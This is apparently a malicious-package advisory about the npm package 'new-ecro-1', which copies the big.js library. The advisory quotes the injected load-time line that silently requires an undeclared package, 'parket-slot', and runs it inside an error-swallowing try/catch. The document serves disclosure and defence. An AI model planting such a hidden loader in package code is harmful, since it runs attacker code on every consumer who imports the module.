MAL-2026-6198

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (0c4e172aa83f2b8742fb014ea649490c87815573cab692ea74eb402ee23f935c) Package `new-ecro-1` impersonates the legitimate `big.js` library by shipping its source verbatim (banner, license, and homepage pointing at MikeMcl/big.js). Inside the load-time IIFE in both `big.js` and `big.mjs` at line 606, an injected block silently executes `const doc = require("parket-slot"); doc.from_str().then(e => {}).catch(e => {})`, wrapped in a try/catch that swallows all errors. The `parket-slot` package is not declared in this manifest's `dependencies` (which instead lists `new-solt-1`), so the require resolves to whatever loader-controlled package happens to be present in the surrounding install tree, executing its `from_str()` on import. The combination of name-impersonation, undeclared cross-package require, and silent error suppression is a loader stub for attacker-controlled code that runs the moment any consumer imports this module.